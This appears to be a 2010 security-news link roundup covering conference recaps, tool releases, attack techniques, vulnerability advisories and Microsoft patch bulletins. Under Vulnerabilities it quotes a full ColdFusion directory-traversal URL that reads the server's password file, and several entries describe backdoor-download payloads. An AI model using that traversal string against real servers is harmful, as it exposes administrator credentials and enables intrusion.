Events Related:
- “Crack Me If You Can” – DEFCON 2010 – korelogic.com
The core-count for teams using clusters or EC2 are rough equivalents based on the number of compute-hours they report having used. See each teams’ specific writeup for more details. - BSidesLasVegas Recap – Day 1 – novainfosecportal.com
Since I took the most notes on the CCDC talk, I figure I’ll start with the other two first. - A week of firsts in Vegas: Surviving B-Sides – tripwire.com
I learned all I could in the 48 hours given, stopping to sleep very little, and two things I learned stand out among the rest. - Security B-Sides: The anti-conference – youtube.com
Help Net Security attended this year’s Security B-Sides Las Vegas and in this video you can see co-founder Chris Nickerson talk about the history of the event, what’s happening this year, as well as some future plans. - RT @dave_rel1k: Follow @DerbyCon for updates regarding the new and upcoming hacker conference #DerbyCon – Sep29-Oct2 2011 – @hdmoore
- Security Ninja Goes Con-Hopping
- Day two of the Vegas cons, BlackHat, defcon registration and fun conversations – securityninja.co.uk
- Day three of the Vegas cons, defcon and nine talks – securityninja.co.uk
Resources:
- DEF CON 18 – Getting Social with the Smart Grid Slides Posted – fyrmassociates.com
My co-presenter, Justin Morehouse, just posted our slides here on SlideShare. - My SecurityBSides Videos and Demos – securityninja.co.uk
I recorded the demo videos in quite a high quality format so I hope you will be able to clearly see the demonstrations and see how I fixed the vulnerabilities I was demonstrating.
Tools:
- 15 new nmap scripts – cqure.net
These scripts include support for collecting Internet password hashes and user ID files. - OpenFISMA Release 2.8.0! – openfisma.org
Endeavor is proud to announce OpenFISMA 2.8.0, the latest release of our award winning FISMA compliance software and enterprise risk management tool. - Metasploit 3.4 and SET 0.6.1 on iPhone 4 – offensive-security.com
Just a quick update on getting your favorite tools on iOS 4 – Metasploit and SET. - Constricting the Web: The GDS Burp API – gdssecurity.com
At GDS, of the many web application security testing tools available, we often use PortSwigger’s Burp Suite. - TitanMist – reversinglabs.com
TitanMist is the nicely packaged and open source catch all tool that will become your first line of defense. - skipfish 1.55b – code.google.com/p/skipfish
A fully automated, active web application security reconnaissance tool. - Summertime and DOMScan – marcoramilli.blogspot.com
DOMScan is utility to drive IE and capture real time DOM from the browser. - BitBlaze – Binary Analysis Platform For Computer Security – darknet.org.uk
Binary analysis is imperative for protecting COTS (common off-the-shelf) programs and analyzing and defending against the myriad of malicious code. - Version 0.2 of SSL Testing Tool ssltest.pl – grey-corner.blogspot.com
The changes in version 0.2 were essentially focused on getting the same functionality from the tool when run in Windows. - Vera 0.20 – Now Available – offensivecomputing.net
If you’re not familiar with VERA, it’s a visualization tool to help understand the dynamic execution of a program. - Social-Engineer Toolkit v0.6.1 Teensy USB HID Attack Vector – secmaniac.com
In the Social-Engineer Toolkit (SET), gives you the ability to choose Metasploit based payloads and drop a small download stager either through WSCRIPT or through PowerShell to download a backdoor from a remote IP/machine and execute it on the system itself. - ROPEME – ROP Exploit Made Easy – vnsecurity.net
ROPEME – ROP Exploit Made Easy – is a PoC tool for ROP exploit automation on Linux x86. - RIPS – sourceforge.net
RIPS is a static source code analyser for vulnerabilities in PHP webapplications.
Techniques:
- BackTrack4-R1 + AWUS036NH = Win! – rootshell.be
For a long time, I used a good old Orinoco PCMCIA card to play around with WiFi networks. - More Updates to the Backtrack 4 Full Disk Encryption How-to – infosecramblings.com
It turns out that the install of R1 pretty much uses up close to 8GB, actually about 7, but who’s counting. - Defcon: Advanced Format String Attacks – redspin.com
My presentation was a continuation of my previous Automatic Format String Exploitation research, and I have updated the materials from the presentation. - Seven Security (Mis)Configurations in Java web.xml Files – sans.org
Instead of rehashing how to configure roles, protect web resources, and set up different types of authentication let’s look at some of the most common security misconfigurations in Java web.xml files. - Spanish Password Security – imperva.com
Of the 32 million passwords, a significant portion, 1,830,196, were identified as Spanish which included passwords that could be bilingual. - Signed Java Applet Security: Worse than ActiveX? – cert.org
From the user awareness point of view, if you are ever presented with a dialog that is requesting permission to run a signed Java applet, keep in mind that the code may be malicious. - Followup to my Facebook research – skullsecurity.org
The first, and most obvious, occurs when Nmap (or the other tools I mentioned) are performing a password-guessing audit against a host. - More Fun With Nessus Reports – wepma.blogspot.com
A common grievance for security professionals dealing with Nessus reports is the organization of the report by host or IP address. - Teensy Pwn – vimeo.com
Teensy device programmed to download and execute MSF payload. - XFS 101: Cross-Frame Scripting Explained – securestate.blogspot.com
XFS exploits a bug in specific browsers that allows a parent frame to be exposed to events in an embedded iFrame inside of it.
Vulnerabilities:
- Oracle Siebel Option Pack for IE ActiveX control memory initialization vulnerability – cert.org
The Oracle Siebel Option Pack for IE ActiveX control fails to properly initialize memory, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. - TANDBERG Video Communication Server Authentication Bypass Vulnerability – securiteam.com
This vulnerability allows for the complete bypass of authentication in the administrative web console. - Adobe ColdFusion Vuln
The vulnerability which was discovered by Richard Brain, was rated as “Important” by Adobe and could affect a large number of Internet-facing web servers.- Adobe ColdFusion Directory Traversal Vulnerability – exploit-db.com
- Coldfusion Directory Traversal FAQ – gnucitizen.org
- Cold Fusion: http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en (carnal0wnage) – @tqbf
Vendor/Software Patches:
- Critical hole closed in Foxit Reader – h-online.com
As previously announced, Foxit Software has closing a critical hole in its PDF reader application that could allow for arbitrary code to be injected into a system. - Fourteen security bulletins released by Microsoft
Eight have a maximum severity rating of Critical with the other six having a maximum severity rating of Important.- Assessing the risk of the August security updates – technet.com
- Microsoft Security Bulletin MS10-047 – Important – microsoft.com
- Microsoft Security Bulletin MS10-048 – Important – microsoft.com
- Microsoft Security Bulletin MS10-049 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-050 – Important – microsoft.com
- Microsoft Security Bulletin MS10-051 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-052 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-053 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-054 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-055 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-056 – Critical – microsoft.com
- Microsoft Security Bulletin MS10-057 – Important – microsoft.com
- Microsoft Security Bulletin MS10-058 – Important – microsoft.com
- Microsoft Security Bulletin MS10-059 – Important – microsoft.com
- Microsoft Security Bulletin MS10-060 – Critical – microsoft.com
- MS10-048 an explanation of the Defense in Depth fixes – technet.com
- MS10-049: A remote Code Execution vulnerability in SChannel, CVE-2010-2566 – technet.com
- MS10-049: An inside look at CVE-2009-3555, the TLS renegotiation vulnerability – technet.com
- MS10-054: Exploitability Details for the SMB Server Update – technet.com
- Adobe Flash update fixes flaw that enables clickjacking attacks – techtarget.com
Adobe repaired six memory corruption vulnerabilities in Flash Player that could enable an attacker to execute code remotely on a victim’s computer.
Other News:
- Toshiba touts drives that wipe data when turned off – computerworld.com
Toshiba on Tuesday introduced a new hard drive feature that can wipe out data after the storage devices are powered down. - Browsers’ private modes leak info, say researchers – computerworld.com
Internet Explorer (IE), Firefox, Chrome and Safari offer private browsing intended to cloak a user from Web sites and erase all browsing evidence from the PC or Mac. - IT Security Pros Mentoring Each Other for Career Growth – cio.com
Since then she has driven InfoSec Mentors by soliciting participants and matching up more veteran professionals with relative newcomers or those who are looking for guidance in making career changes. - Verizon DBIR Cryptography Challenge: Here’s The First Clue – threatpost.com
So, according to a little birdie tweeting in the night, the 2010 Verizon Data Breach Investigations Report (DBIR) contains another encryption challenge that leads to actual cash prizes. - Cars are hackable, just use the tire monitors
A team of researchers at a university has devised a way to hack into a car’s warning system via wireless sensors.- Cars hacked by researchers through wireless tire pressure monitors – autoblog.com
- Hackers crash car computer while car is driving – slashgear.com
- New Mobile Security Threat: Fingerprint Oil – darkreading.com
Prepare for a new mobile security threat: smudges. - Researcher Pinpoints Widespread Common Flaw Among VxWorks Devices – darkreading.com
Diagnostics service feature in VxWorks OS kept activated in some VoIP, DSL, SCADA systems leaves them open to attack. - Security flaws haunt NTLMv1-2 challenge-response protocol – zdnet.com
NTLMv2 is the challenge-response protocol for performing MS Windows password authentication over the networks. - Cloning Retail Gift Cards – schneier.com
After researching how gift cards work, Zepeda purchased a magnetic card reader online, began stealing blank gift cards, on display for purchase, from Fred Meyer and scanning them with his reader. - Ain’t “fat” tweets sweet? (they were) – scripting.com
But t.co doesn’t check to see that the thing you’re shortening is actually a url. You can shorten things that aren’t.
Leave A Comment